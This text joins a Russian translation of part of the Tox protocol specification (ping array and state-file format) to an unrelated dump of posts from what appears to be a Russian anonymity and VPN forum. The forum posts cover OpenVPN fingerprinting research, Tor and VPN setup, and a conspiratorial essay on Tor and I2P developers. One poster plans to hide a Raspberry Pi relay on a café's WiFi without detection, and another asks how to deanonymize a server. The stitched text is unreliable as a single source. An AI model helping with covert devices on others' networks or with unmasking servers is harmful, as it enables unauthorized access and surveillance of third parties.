При добавлении записи в массив ping он возвращает 8-байтовое число, которое может быть использовано в качестве номера ping-пакета. Это число генерируется путем генерации случайного 8-байтового числа (toxcore использует криптографический безопасный генератор случайных чисел), деления его на общий размер массива и добавления индекса добавленного элемента. В результате генерируется случайное число, которое возвращает индекс элемента, добавленного в массив. Это число также сохраняется вместе с добавленными данными и текущим временем (для проверки тайм-аута). Данные добавляются в массив циклически (0, 1, 2, 3... (размер массива - 1), 0, 1, ...). Если массив переполнен, самый старый элемент перезаписывается.
Чтобы получить данные из массива ping, номер ping передается в функцию для получения данных из массива. По модулю числа ping с общим размером массива будет возвращен индекс, в котором находятся данные. Если по этому индексу нет данных, функция возвращает ошибку. Затем номер пинга сверяется с номером пинга, сохраненным для данного элемента, если они не равны, функция возвращает ошибку. Если элемент массива вышел по таймеру, функция возвращает ошибку. Если все проверки прошли успешно, функция возвращает именно те данные, которые были сохранены, и удаляет их из массива.

Массив Ping используется во многих местах в toxcore для эффективного отслеживания отправленных пакетов.

19 Формат состояния

Эталонная реализация Tox использует собственный двоичный формат для сохранения состояния клиента Tox между перезапусками. Этот формат далек от совершенства и со временем будет заменен. Для поддержания совместимости в будущем, он документирован здесь.
Двоичное кодирование всех целочисленных типов в формате состояния представляет собой последовательность байтов фиксированной ширины с кодировкой целого числа в Little Endian, если не указано иное.

Length| Contents
---|---
4| Zeroes
4| uint32_t (0x15ED1B1F)
?| List of sections

19.1 Разделы

Ядро формата состояния состоит из списка секций. В начале каждого раздела указывается его тип и длина. В некоторых случаях раздел содержит только один элемент и поэтому занимает всю длину раздела. Это обозначается символом '?'.

Length| Contents
---|---
4| uint32_t Length of this section
2| uint16_t Section type
2| uint16_t (0x01CE)
?| Section

Типы разделов:

Name| Value
---|---
NospamKeys| 0x01
DHT| 0x02
Friends| 0x03
Name| 0x04
StatusMessage| 0x05
Status| 0x06
TcpRelays| 0x0A
PathNodes| 0x0B
EOF| 0xFF

Не каждый раздел, перечисленный выше, требуется для восстановления из файла состояния. Требуется только NospamKeys.

19.1.1 Nospam и ключи (0x01)

Length| Contents
---|---
4| uint32_t Nospam
32| Long term public key
32| Long term secret key

19.1.2 DHT (0x02)

Этот раздел содержит список разделов, связанных с DHT.

Длина| Содержание
---|---
4| uint32_t(0x159000D)
?| Список разделов DHT

19.1.2.1 Разделы DHT

Каждый раздел DHT имеет следующую структуру:

Длина| Содержание
---|---
4| uint32_tДлина этого раздела
2| uint16_tТип секции DHT
2| uint16_t(0x11СЕ)
?| Раздел DHT

Типы разделов DHT:

Имя| Ценить
---|---
Узлы| 0x04

19.1.2.1.1 Узлы (0x04)

Этот раздел содержит список узлов. Эти узлы используются для быстрого повторно подключиться к DHT после перезапуска клиента Tox.

Длина| Содержание
---|---
?| Список узлов

Структура узла такая же, как Node Info. Примечание: это означает, что целые числа, хранящиеся в этих узлах, также хранятся в Big Endian.

19.1.3 Друзья (0x03)

В этом разделе находится список друзей. Друг может быть либо сверстником, с которым мы отправили запрос на добавление в друзья или коллеге, от которого мы приняли запрос на добавление в друзья.

Length| Contents
---|---
1| uint8_t Status
32| Long term public key
1024| Friend request message as a byte string
1| PADDING
2| uint16_t Size of the friend request message (BE)
128| Name as a byte string
2| uint16_t Size of the name (BE)
1007| Status message as a byte string
1| PADDING
2| uint16_t Size of the status message (BE)
1| uint8_t User status (see also: USERSTATUS)
3| PADDING
4| uint32_t Nospam (only used for sending a friend request)
8| uint64_t Last seen time

Статусы друзей:

Status| Meaning
---|---
0| Not a friend
1| Friend added
2| Friend request sent
3| Confirmed friend
4| Friend online

19.1.4 Имя (0x04)

Длина| Содержание
---|---
?| Имя в виде строки в кодировке UTF-8

19.1.5 Сообщение о состоянии (0x05)

Длина| Содержание
---|---
?| Сообщение о состоянии в виде строки в кодировке UTF-8

19.1.6 Статус (0x06)

Длина| Содержание
---|---
1| uint8_tСтатус пользователя (см. также: USERSTATUS)

19.1.7 TCP-реле (0x0A)

Этот раздел содержит список реле TCP.

Длина| Содержание
---|---
?| Список реле TCP

Структура ретранслятора TCP такая же, как Node Info. Примечание: это означает, что целые числа, хранящиеся в этих узлах, также хранятся в Big Endian.

19.1.8 Узлы пути (0x0B)

Этот раздел содержит список узлов пути, используемых для луковой маршрутизации.

Длина| Содержание
---|---
?| Список узлов пути

Структура узла пути такая же, как и Node Info. Примечание: это означает, что целые числа, хранящиеся в этих узлах, также хранятся в Big Endian.

19.1.9 EOF (0xFF)

Этот раздел указывает на конец файла состояния. В этом разделе нет содержание и, следовательно, его длина равна 0.

20 Тестирование

Заключительной частью архитектуры является протокол тестирования. Мы используем MessagePack Протокол RPC на основе для раскрытия языка независимые интерфейсы к внутренним функциям. Использование тестирования на основе свойств с случайные входные данные, а также специальные тесты пограничного случая помогают гарантировать, что реализация протокола Tox в соответствии с архитектурой, указанной в этом документ правильный.

Исследователи раскрыли 3 способа определения сеансов OpenVPN в транзитном трафике

ID: 676533bbb4103b69df37198b
Thread ID: 110824
Created: 2024-03-19T20:08:37+0000
Last Post: 2024-03-24T18:17:56+0000
Author: tabac
Replies: 2 Views: 345

Группа исследователей из Мичиганского университета опубликовала результаты исследования возможности идентификации (VPN Fingerprinting) соединений к серверам на базе OpenVPN при мониторинге транзитного трафика. В итоге было выявлено три способа идентификации протокола OpenVPN среди других сетевых пакетов, которые могут использоваться в системах инспектирования трафика для блокирования виртуальных сетей на базе OpenVPN.

Тестирование предложенных методов в сети интернет-провайдера Merit, насчитывающего более миллиона пользователей, показало возможность идентификации 85% OpenVPN-сеансов при незначительном уровне ложных срабатываний. Для проверки был подготовлен инструментарий, который вначале в пассивном режиме на лету определял трафик OpenVPN, а затем удостоверяется в корректности результата через активную проверку сервера. На созданный исследователями анализатор был отзеркалирован поток трафика, интенсивностью примерно 20 Gbps.

В ходе эксперимента анализатор смог успешно определить 1718 из 2000 тестовых OpenVPN-соединений, установленных подставным клиентом, на котором было использовано 40 различных типовых конфигураций OpenVPN (метод успешно сработал для 39 из 40 конфигураций). Кроме того, за восемь дней проведения эксперимента в транзитном трафике было выявлено 3638 сеансов OpenVPN, из которых было подтверждено 3245 сеанса. Отмечается, что верхняя граница ложных срабатываний в предложенном методе на три порядка ниже, чем в ранее предлагавшихся методах, основанных на применении машинного обучения.

Отдельно была оценена работа методов защиты от отслеживания трафика OpenVPN в коммерческих сервисах - из 41 протестированного VPN-сервиса, использующего методы скрытия трафика OpenVPN, трафик удалось идентифицировать в 34 случаях. Сервисы, которые не удалось обнаружить, помимо OpenVPN использовали дополнительные слои для скрытия трафика (например, пробрасывание OpenVPN- трафика через дополнительный шифрованный туннель). В большинстве успешно определённых сервисов использовалось искажение трафика при помощи операции XOR, дополнительные слои обфускации без должного случайного дополнения трафика или наличие необфусцированных OpenVPN-служб на том же сервере.

Задействованные способы идентификации основываются на привязке к специфичным для OpenVPN шаблонам в незашифрованных заголовках пакетов, размеру ACK-пакетов и ответам сервера. В первом случае, в качестве объекта для идентификации на стадии согласования соединения может использоваться привязка к полю "opcode" в заголовке пакетов, которое принимает фиксированный диапазон значений и определённым образом меняется в зависимости от стадии установки соединения. Идентификация сводится в выявлению определённой последовательности изменения opcode в первых N-пакетах потока.

Второй способ основывается на том, что ACK-пакеты применяются в OpenVPN только на стадии согласования соединения и при этом имеют специфичный размер. Идентификация основывается на том, что ACK-пакеты заданного размера встречаются только в определённых частях сеанса (например, при использовании OpenVPN первый ACK-пакет обычно является третьим пакетом с данными, переданным в сеансе).

Третий метод является активной проверкой и обусловлен тем, что в ответ на запрос сброса соединения сервер OpenVPN отправляет определённый RST-пакет (проверка не работает при использовании режима "tls-auth" так как OpenVPN- сервер при нём игнорирует запросы от клиентов, не аутентифицированных через TLS).

OpenVPN Is Open to VPN Fingerprinting | Hacker News

news.ycombinator.com

OpenVPN is Open to VPN Fingerprinting

VPN/proxy сервисы. Обсуждение, какой выбрать (итд)

ID: 676533bbb4103b69df371ad7
Thread ID: 71412
Created: 2022-08-15T14:02:50+0000
Last Post: 2022-08-15T18:27:34+0000
Author: TommyVic
Replies: 1 Views: 343

DimmuBurgor said:

Do not suggest using them there is much better alternatives

Click to expand...

What alternatives?

korofko

ID: 676533bbb4103b69df371b2e
Thread ID: 62674
Created: 2022-02-09T06:40:17+0000
Last Post: 2022-03-22T12:34:13+0000
Author: Premium
Replies: 3 Views: 340

сервис еще жив? если да, то отпишите плиз мне в лс

Tox на ios

ID: 676533bbb4103b69df3719b2
Thread ID: 107510
Created: 2024-02-05T08:03:56+0000
Last Post: 2024-02-05T12:45:21+0000
Author: gustav66
Replies: 8 Views: 339

Подскажите, кто нибудь знает актуальное приложение? Antidote и konv удалены с магазина.

Как проксифицировать Wi-Fi на Mikrotik

ID: 676533bbb4103b69df371b72
Thread ID: 59607
Created: 2021-12-02T22:40:44+0000
Last Post: 2021-12-14T01:01:54+0000
Author: J7inda
Replies: 3 Views: 338

Подскажите пожалуйста как поставить сокс5 на Микрот и раздавать его через Wi- fi

METAMASK - Сеть Ethereum Mainnet / URL-адрес RPC

ID: 676533bbb4103b69df371a89
Thread ID: 80798
Created: 2023-01-28T16:23:37+0000
Last Post: 2023-01-29T16:10:53+0000
Author: mmdblack
Replies: 2 Views: 337

Может кто в курсе по работе с сетью Ethereum Mainnet (METAMASK)

В поле Новый URL-адрес RPC указано https://mainnet.infura.io/v3/
так вот говорят что infura палит и сливает ваш IP адрес
и что надо выбрать из списка https://chainlist.org другой RPC

если кто в теме подскажите кто какой использует
и как его вообще изменить если он не редактируется (стоит замок напротив сети)

Спасибо

Kак создать цепь из OpenVPN серверов?

ID: 676533bbb4103b69df371ada
Thread ID: 70858
Created: 2022-07-29T21:31:19+0000
Last Post: 2022-08-13T17:33:37+0000
Author: lonewolf
Replies: 5 Views: 336

из того что я читал, связать опенвпн сервера в цепь можно через iptables, перенаправляя трафик с конкретного сокета на сокет следующего сервера. Oднако, гайды из гугла ничего интересного не подсказали, а личной экспертизы не хватает. заранее благодарен

win10+veracrypt+Yubikey

ID: 676533bbb4103b69df3719fd
Thread ID: 99752
Created: 2023-10-09T21:52:05+0000
Last Post: 2023-10-10T09:33:25+0000
Author: Lock3xL
Replies: 1 Views: 334

win10+veracrypt+Yubikey. есть готовые мануалы как все по уму сделать?

Установка Raspberry Pi под общедоступный WiFi // вопрос

ID: 676533bbb4103b69df3719cb
Thread ID: 105333
Created: 2024-01-08T13:10:47+0000
Last Post: 2024-01-09T21:07:22+0000
Author: Quanter
Replies: 3 Views: 333

Реализация: есть малинка, хочу установить её под общедоступный WiFi в кафешке, там Starlink. (есть укромное местечко и источник питания 24/7)
После физ. установки, поднять OpenVPN сервер, отключить логирование, реализовать защиту от физ. атак и прочее, но это не суть..
Само устройство будет надёжно спрятано, не факт что вовсе будет обнаружено при принималове.

Подключение к малинке удалённое, с рабочего места с шифрованием соединения через double VPN / прогоню через i2p.
Хочу услышать ваше мнение и потенциальные пробелы в этой "связке" (не учитывая физ. проеб с установкой типа засвет на камерах, пальцы и прочее)

OpenVPN или WireGuard?

ID: 676533bbb4103b69df371b81
Thread ID: 58798
Created: 2021-11-12T19:14:16+0000
Last Post: 2021-11-12T22:19:09+0000
Author: chillco
Replies: 4 Views: 333

Здравствуйте. Хочу поднять свой VPN сервер. Выбираю между OpenVPN и WireGuard. Важна скорость, но больше важна приватность. Много где пишут, что WireGuard быстрее, но не имеет возможности отключить логи и не спроектирован для приватности и анонимности, так ли это? И все же, возможно ли отключить логи в WireGuard? Знаю, многие его используют, боролись ли вы с логами и как? OpenVPN таких проблем не имеет?

Обратный прокси

ID: 676533bbb4103b69df371b7e
Thread ID: 58857
Created: 2021-11-14T09:23:58+0000
Last Post: 2021-11-17T17:39:36+0000
Author: Igrmr
Replies: 6 Views: 333

Коллеги, нужна консультация. Имеется сервер, который используется как обратный прокси. Существует ли какой-нибудь способ деанонимизации исходя из спецификации сервера ниже?

Spoiler: Данные

Сервер Werkzeug/1.0.1 Python/2.7.15, консоль закрыта

Конфиденциальность и анонимность: в чем разница?

ID: 676533bbb4103b69df371a35
Thread ID: 93894
Created: 2023-07-25T07:53:01+0000
Last Post: 2023-07-26T06:38:52+0000
Author: g-man-original
Prefix: Статья
Replies: 2 Views: 331

Люди часто путают эти два термина, но различие между ними важно. И потом попадают в странные ситуации. Предлагаю разобраться в терминологии. Разберем пример на основе опроса пользователей.

Когда исследователи используют опросы для сбора данных от отдельных лиц, они часто говорят, что опрос будет проводиться конфиденциально или анонимно.
**
Конфиденциальный сбор данных**

Когда данные собираются конфиденциально , исследователи могут идентифицировать отдельных субъектов и их конкретные ответы. Обычно исследователи присваивают каждому человеку номер или некоторый код, чтобы их можно было идентифицировать.

После сбора данных опроса существует несколько способов обеспечить их защиту и сохранение конфиденциальности, в том числе:

Использование физических средств защиты данных, таких как запирающиеся шкафы, уединенные комнаты для допросов, личные кабинеты, защищенные паролем центры обработки данных и т. д.

Разрешение как можно меньшему количеству людей иметь доступ к данным, чтобы предотвратить возможность утечки информации кем-либо в случае аварии.

Использование компьютерных паролей, антивирусного программного обеспечения, брандмауэров и шифрования для обеспечения того, чтобы любые данные, хранящиеся в цифровом виде, не могли быть доступны кому-либо без разрешения.

Когда сообщаются результаты опроса, общие данные должны быть объединены вместе, чтобы нельзя было узнать ответы какого-либо конкретного человека. Например, в исследовании может быть сказано, что «40% людей заявили, что они уверены в своих навыках ведения переговоров», а не что-то вроде «люди с фамилиями Смит, Андерсон, Миллер и Ховак сказали, что они уверены в своих навыках ведения переговоров». ».

Все статистические данные и цифры, используемые в результатах исследования, должны указываться на групповом, а не на индивидуальном уровне.

Анонимный сбор данных

Когда данные собираются анонимно , исследователи не могут идентифицировать отдельных субъектов и их конкретные ответы. То есть только сами люди знают, что они участвовали в исследовании, и только они знают свои конкретные ответы.

Когда данные собираются таким образом, люди деидентифицируются, и лицам не присваиваются коды, поэтому невозможно связать какие-либо конкретные ответы с определенными людьми.

Это означает, что не собирается информация о конкретных лицах, такая как адрес, имя, номер телефона, номер социального страхования или любая другая информация, которая позволила бы связать человека с его ответами на опрос.

Конфиденциальность против анонимности

Важно отметить, что исследовательское исследование не может собирать данные одновременно конфиденциально и анонимно.

Например, если исследователи приглашают людей лично ответить на вопросы опроса в отдельной комнате, то, очевидно, данные не будут анонимными, поскольку исследователи знают, какие люди предоставили какие ответы. В этом случае они должны обеспечить конфиденциальность сбора и хранения данных опроса.

С другой стороны, если люди проходят онлайн-опрос анонимно, нет необходимости хранить данные в конфиденциальном порядке, поскольку нет уникальных идентифицирующих характеристик, которые могли бы связать ответы на опросы с конкретными людьми. В этом случае исследователям просто нужно убедиться, что при обмене данными они агрегированы и представлены на групповом уровне.

Для данных, которые собираются в ходе онлайн-опросов, исследователи также должны убедиться, что невозможно определить конкретный IP-адрес, с которого пришли ответы на опрос, в противном случае можно будет определить, какие лица с конкретных IP-адресов предоставили какие ответы. Это нарушило бы анонимность людей.

Немного приближенный разговор к нашей тематике.

Если вы к примеру возьмете ваш любимый телеграм. Вы там увидите что он не анонимный, а конфиденциальный. То есть он собирает данные, но ни кому не рассказывает. Наверное. Поэтому мы должны для себя понять, если сервис или программа, просит хоть какие-то данные от вас кроме ника, то она уже по определению не анонимна. Анонимность можно придать только с помощью ваших навыков и ухищрений.

VPN -> Tor

ID: 676533bbb4103b69df371b52
Thread ID: 61939
Created: 2022-01-24T20:51:43+0000
Last Post: 2022-01-26T14:00:39+0000
Author: Player_1
Replies: 1 Views: 330

Как можно завернуть весь трафик со своего сервeра ВПНа в тор? Я пробовал создавать iptables правила перенаправляя весь трафик сервера через 127.0.0.1:9050, использовал готовое решение toriptables3. На самом сервере все работает отлично, но при подключении к нему с помощью "openvpn MyConf.ovpn", просто не работает. Бесконечное ожидание просто, и все.

Code:Copy to clipboard

#!/bin/bash if [ $(whoami) != "root" ]; then echo "Must be run as root" exit 1 elif ( ! dpkg-query --list openvpn | grep -q "ii"); then echo "Please install OpenVPN to your system." exit 1 elif ( ! dpkg-query --list tor | grep -q "ii"); then echo "Please install Tor to your system." exit 1 elif ( ! systemctl is-active --quiet openvpn 2>/dev/null); then echo "OpenVPN server is not running. Please start OpenVPN service and try again!" exit 1 fi IPTABLES=$(which iptables) # /sbin/iptables OVPN=$(ip r | grep "tun" | awk '{print $3}') # tun0 VPN_IP=$(ip r | grep "tun" | awk '{print $9}') # 10.8.0.1 function route() { local arg=$1 # Config IPtables to route all traffic trough Tor proxy # transparent Tor proxy $IPTABLES $arg INPUT -i $OVPN -s 10.8.0.0/24 -m state --state NEW -j ACCEPT $IPTABLES -t nat $arg PREROUTING -i $OVPN -p udp --dport 53 -s 10.8.0.0/24 -j DNAT --to-destination $VPN_IP:53530 $IPTABLES -t nat $arg PREROUTING -i $OVPN -p tcp -s 10.8.0.0/24 -j DNAT --to-destination $VPN_IP:9040 $IPTABLES -t nat $arg PREROUTING -i $OVPN -p udp -s 10.8.0.0/24 -j DNAT --to-destination $VPN_IP:9040 ## Transproxy leak blocked: # https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy#WARNING $IPTABLES $arg OUTPUT -m conntrack --ctstate INVALID -j DROP $IPTABLES $arg OUTPUT -m state --state INVALID -j DROP $IPTABLES $arg OUTPUT ! -o lo ! -d 127.0.0.1 ! -s 127.0.0.1 -p tcp -m tcp --tcp-flags ACK,FIN ACK,FIN -j DROP $IPTABLES $arg OUTPUT ! -o lo ! -d 127.0.0.1 ! -s 127.0.0.1 -p tcp -m tcp --tcp-flags ACK,RST ACK,RST -j DROP } if ($IPTABLES --check INPUT -i $OVPN -s 10.8.0.0/24 -m state --state NEW -j ACCEPT 2>/dev/null); then echo "Stoping Tor and remove iptables routes" systemctl stop tor route "-D" else echo "Starting Tor and adding iptables routes" systemctl start tor sleep 3 route "-A" echo "Now you can connect to your VPN and surf on the TOR network" fi

Пробовал откопанный из недр баш, тоже не помогло.

Секреты/Тактика безопасности/анонимности в интернете

ID: 676533bbb4103b69df371a23
Thread ID: 96223
Created: 2023-08-21T19:08:29+0000
Last Post: 2023-08-21T19:08:29+0000
Author: Knew100
Prefix: Статья
Replies: 0 Views: 329

Мануал в двух частях:

Секреты безопасности/анонимности в интернете 2021

Тактика и техника информационной безопасности:

Проблема информационной безопасности

Аппаратная часть

Программная часть

Браузер для поиска в сети

Orbot

Телеграм

Шифрование. Openkeychain

Безопасное приложение для общения. Conversations

Для опытных старичков мануалы не секретные, надеюсь понимаетеМануалы - https://mega.nz/file/3mw2DQIB#Uur0YjH0cyDQYAAGTA76Qmx7fmoqR_SWZlx6Mi3XpWE

О скрытых сетях и анонимности их разработчиков

ID: 676533bbb4103b69df371ae9
Thread ID: 70586
Created: 2022-07-24T05:55:59+0000
Last Post: 2022-07-27T09:55:23+0000
Author: peacemaker
Replies: 4 Views: 326

Тоталитаризм и диктатура имели место в любой исторический промежуток, о котором знает современная наука. Однако человек склонен к вольномыслию и недовольству всем, что этому препятствует. В наше время обе стороны вопроса по-прежнему актуальны: одни неустанно пытаются запрещать и карать за неугодные высказывания, другие эти высказывания постоянно генерируют.

Чтобы не заострять идеологические углы статьи, опустим рассуждения про возможное ущемление свободы слова, совести и прочего, что вроде бы должно быть свободным. По тем или иным причинам люди нередко хотят остаться неназванными, прибегая для этого к программным средствам анонимизации. В этой статье вы узнаете почему разработчики программ для анонимности в глобальной сети сами должны оставаться terra incognita.

[ терра инкогнита — Викисловарь

](https://ru.wiktionary.org/wiki/%D1%82%D0%B5%D1%80%D1%80%D0%B0_%D0%B8%D0%BD%D0%BA%D0%BE%D0%B3%D0%BD%D0%B8%D1%82%D0%B0)

![ru.wiktionary.org](/proxy.php?image=https%3A%2F%2Fru.wiktionary.org%2Fstatic%2Fapple- touch%2Fwiktionary.png&hash=31910cc820240d242ebf605837ff1963&return_error=1) ru.wiktionary.org

Обольщение Луковичной сети
Самым популярным инструментом анонимности в сети является Tor. Для пользователя, далекого от темы сетей и процесса создания ПО в целом, Tor является ящиком Пандоры и священным Граалем анонимности. Такое мнение внушают многие источники, в том числе сам проект Tor, поддерживаемый главным образом не добровольными донатами, а Министерством обороны и Государственным департаментом США. Надо заметить, что Tor изначально является разработкой силовых ведомств этой страны (с 1995 года). Только в 2006 году для развития сети была создана некоммерческая организация Tor Project, которая по сей день является обложкой Tor-браузера, столь любимого юными искателями анонимности.

У проницательного читателя на этом месте может возникнуть легкий когнитивный диссонанс: Соединенные Штаты Америки, знаменитые по всему миру скандалами о тотальной слежке за населением планеты, разработали и отдали в общее пользование инструмент свободы слова!

[ Сноуден, Эдвард — Википедия

](https://ru.wikipedia.org/wiki/%D0%A1%D0%BD%D0%BE%D1%83%D0%B4%D0%B5%D0%BD,_%D0%AD%D0%B4%D0%B2%D0%B0%D1%80%D0%B4)

![ru.wikipedia.org](/proxy.php?image=https%3A%2F%2Fru.wikipedia.org%2Fstatic%2Fapple- touch%2Fwikipedia.png&hash=2488ff11db86eddf667b55a8f954aec4&return_error=1) ru.wikipedia.org

К чести всех почитателей надо сказать, что Tor является проектом с открытым исходным кодом, что позволяет программистам по всему миру проверить качество программы и выявить возможные слабые места. Также в 2011 году Tor удостоился премии общественной значимости Фонда свободного программного обеспечения, а в 2012 году — награды EFF Pioneer Award.

Несмотря на открытый код клиента Tor, сеть имеет архитектурные слабости в виде стартовых и консенсусных узлов, обеспечивающих ее глобальное функционирование. Критическая инфраструктура сети распределена между авторитетными учреждениями вроде университетов и общественных организаций, однако сам факт заведомо известных гарантов работоспособности сети вызывает опасения. Часть гарантов вовсе является организациями, напрямую зависимыми от государства.

Tor имеет несколько задокументированных случаев сбоя работы. В основном такие новости связаны с атаками извне, а не с архитектурными недочетами самого проекта. Большинство инцидентов гуглятся с большим трудом, либо вовсе отсутствуют в поисковой выдаче. Возможная причина кроется в том, что сеть настолько никому не интересна, что о ней не утруждаются писать (хотя это вряд ли).

Последним крупным инцидентом с сетью Tor, который был непосредственно связан с уязвимой архитектурой сети, было отключение более половины консенсусных узлов в январе 2021 года, что удивительным образом совпало с беспорядками в Америке. Вследствие атаки все внутрисетевые домены «.onion» v3 были недоступны в течение нескольких часов, т.е. получить доступ к анонимным ресурсам сети было невозможно.

Приведенной информации достаточно, чтобы предположить, что Tor является инструментом свободы слова не вообще, а «где-то там», но, когда это «где-то там» начинается в США, правительство которой держит скрытую сеть под своим крылом, сеть может прекратить выполнять свои функции. Также в интернете можно найти мнение, согласно которому Tor в начале 2000-ых годов был выпущен в общий доступ с основным прицелом на Китай, который сохранял свой социалистический уклон в политике даже после распада СССР – некогда главного идеологического врага Штатов.

![ru.wikipedia.org](/proxy.php?image=https%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F7%2F7f%2FFree_Software_Foundation_office_%25282346065159%2529.jpg%2F1200px- Free_Software_Foundation_office_%25282346065159%2529.jpg&hash=5af13e94b5d9c016893f744c2b365c1d&return_error=1)

[ Фонд свободного программного обеспечения — Википедия

](https://ru.wikipedia.org/wiki/%D0%A4%D0%BE%D0%BD%D0%B4_%D1%81%D0%B2%D0%BE%D0%B1%D0%BE%D0%B4%D0%BD%D0%BE%D0%B3%D0%BE_%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%BD%D0%BE%D0%B3%D0%BE_%D0%BE%D0%B1%D0%B5%D1%81%D0%BF%D0%B5%D1%87%D0%B5%D0%BD%D0%B8%D1%8F)

![ru.wikipedia.org](/proxy.php?image=https%3A%2F%2Fru.wikipedia.org%2Fstatic%2Fapple- touch%2Fwikipedia.png&hash=2488ff11db86eddf667b55a8f954aec4&return_error=1) ru.wikipedia.org

[ EFF Pioneer Award — Википедия

](https://ru.wikipedia.org/wiki/EFF_Pioneer_Award)

![ru.wikipedia.org](/proxy.php?image=https%3A%2F%2Fru.wikipedia.org%2Fstatic%2Fapple- touch%2Fwikipedia.png&hash=2488ff11db86eddf667b55a8f954aec4&return_error=1) ru.wikipedia.org

![www.linux.org.ru](/proxy.php?image=https%3A%2F%2Fwww.linux.org.ru%2Fimg%2Fgood- penguin.png&hash=a4412ad4214fffcdfce2c6bb89b17ed3&return_error=1)

[ Зафиксирована одна из крупнейших атак на сеть Tor

](https://www.linux.org.ru/news/internet/11165438)

Подтвердилась появившаяся 22 ноября информация о готовящейся крупной атаке на Tor, которая якобы должна была произойти в ближайшие дни. О начале атаки заявили хакеры из Lizard Squad (эта группа известна взломами серверов Sony PlayStation и Xbox L...

www.linux.org.ru

Consensus health

![consensus-health.torproject.org](/proxy.php?image=https%3A%2F%2Fconsensus- health.torproject.org%2Ffavicon.ico&hash=1eca31881a743f4b9e361620cb94b40b&return_error=1) consensus-health.torproject.org

[ Захват Капитолия США (2021) — Википедия

](https://ru.wikipedia.org/wiki/%D0%97%D0%B0%D1%85%D0%B2%D0%B0%D1%82_%D0%9A%D0%B0%D0%BF%D0%B8%D1%82%D0%BE%D0%BB%D0%B8%D1%8F_%D0%A1%D0%A8%D0%90_(2021))

![ru.wikipedia.org](/proxy.php?image=https%3A%2F%2Fru.wikipedia.org%2Fstatic%2Fapple- touch%2Fwikipedia.png&hash=2488ff11db86eddf667b55a8f954aec4&return_error=1) ru.wikipedia.org

Некоторая часть энтузиастов скрытых сетей, устойчивых перед цензурой и мониторингом, считают Tor баловством и призывают отказаться от него особенно в тех ситуациях, когда важность сохранения анонимности пользователя выходит на государственный уровень.

Ситуацию спасет инкогнито
Вторым среди инструментов анонимности является сеть I2P. Меньшая известность обуславливается более высоким порогом вхождения для новичка, а также отсутствием рекламы, спонсированной правительством какой-либо страны. Существуют два независимых клиента сети: Java router и i2pd.

В отличие от Tor, сеть I2P с самого начала разрабатывается сообществом энтузиастов и не аффилирована с правоохранительными органами. Все имеющиеся стартовые узлы I2P, нужные для первого запуска клиента сети, держат энтузиасты (неназванные лица в своем большинстве), оказать давление на которых сложнее, чем на университет, потому что появляется дополнительная задача их поиска. Кроме этого I2P-роутер можно завести вовсе без обращения к стартовым узлам.

Вопросы вызывают решения, принимаемые при разработке Java-роутера, которые упираются в нелогичность и намеренное игнорирование выявленных уязвимостей. Для справки: Java-роутер – это популярный клиент сети, разрабатываемый с начала 2000-ых годов (альтернативный роутер «i2pd» берет начало в 2013 году).

Разработку популярного клиента на протяжении более, чем десяти лет, курирует один человек с никнеймом zzz. Под его контролем находится самый авторитетный ресурс stats.i2p: каталог скрытых сайтов и (бесплатный) регистратор коротких доменных имен в зоне «.i2p». В адрес stats.i2p неоднократно высказывались претензии из-за цензуры. Цензура на основном ресурсе анонимной не цензурируемой сети?! Когда в мире пошла волна #BlackLivesMatter, zzz без обсуждения с сообществом изменил слово "master" на "primary" во многих местах кода I2P-роутера, а также начал еще более агрессивно игнорировать новые и удалять старые ресурсы с правой тематикой. В конечном счете споров сообществом был создан независимый регистратор reg.i2p, добавить который в Java-роутер zzz отказывается, ссылаясь на отсутствие цензуры.

Вопиющим является длительное пренебрежение критической уязвимостью, которая позволяет деанонимизировать администратора скрытого ресурса. Разработчик Java- роутера признал опасность атаки, но не предпринял каких-либо действий. Уязвимость обнародована ведущим разработчиком альтернативного клиента, где проблема решена на стадии начальной разработки.

Завесу загадочного поведения zzz, несоответствующего духу I2P, приоткрывает факт его публичности. Его личность гуглится не первой строкой поисковой выдачи, но весьма просто: он принимает личное участие на встречах, посвященных разработке.

Анонимная сеть I2P

Механизм анонимной передачи данных точка-точка, основанный на средствах с открытым исходным кодом и предназначенный для работы многих стандартных интернет-сервисов, таких как электронная почта, IRC или веб-хостинг.

geti2p.net

Invisible Internet Protocol Daemon

i2pd.website

[ Разбор атаки на пользователя I2P

](https://habr.com/ru/post/554062/#reseed)

История сети I2P берет свое начало в 2003 году, в связи с чем обросла слухами, домыслами и статьями об уязвимостях, часть из которых уже неактуальна. Перед началом основного повествования обозначим...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

[ SAM: Rename 3.3 control session · i2p/i2p.i2p@075ac7a

](https://github.com/i2p/i2p.i2p/commit/075ac7ab43bee022ae88f6e07d5fb1471f40d7bd)

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. - SAM: Rename 3.3 control session ·...

github.com

PurpleI2P

PurpleI2P has 22 repositories available. Follow their code on GitHub.

github.com

[ Разбор атаки на пользователя I2P

](https://habr.com/ru/post/554062/#java)

История сети I2P берет свое начало в 2003 году, в связи с чем обросла слухами, домыслами и статьями об уязвимостях, часть из которых уже неактуальна. Перед началом основного повествования обозначим...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

orignal - C++ разработчик

orignal. Опубликовал 11 статей на Хабр и оставил 280 комментариев.

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

Чтобы не увеличивать конспирологический градус статьи, не буду приводить предположения о характере взаимодействия zzz с правоохранителями. Чуткий читатель может сам представить уровень ответственности, которую общественность хочет взвалить на плечи человека, трудящегося над инструментом анонимности. В дело пойдет все: криминал, насилие, извращенцы и тому подобное. Лишь единицы трезво скажут, что подобный инструментарий используется в криминальных целях в меньшинстве случаев, однако позволяет пользователям делиться мнением на любые темы без оглядки на Большого брата.

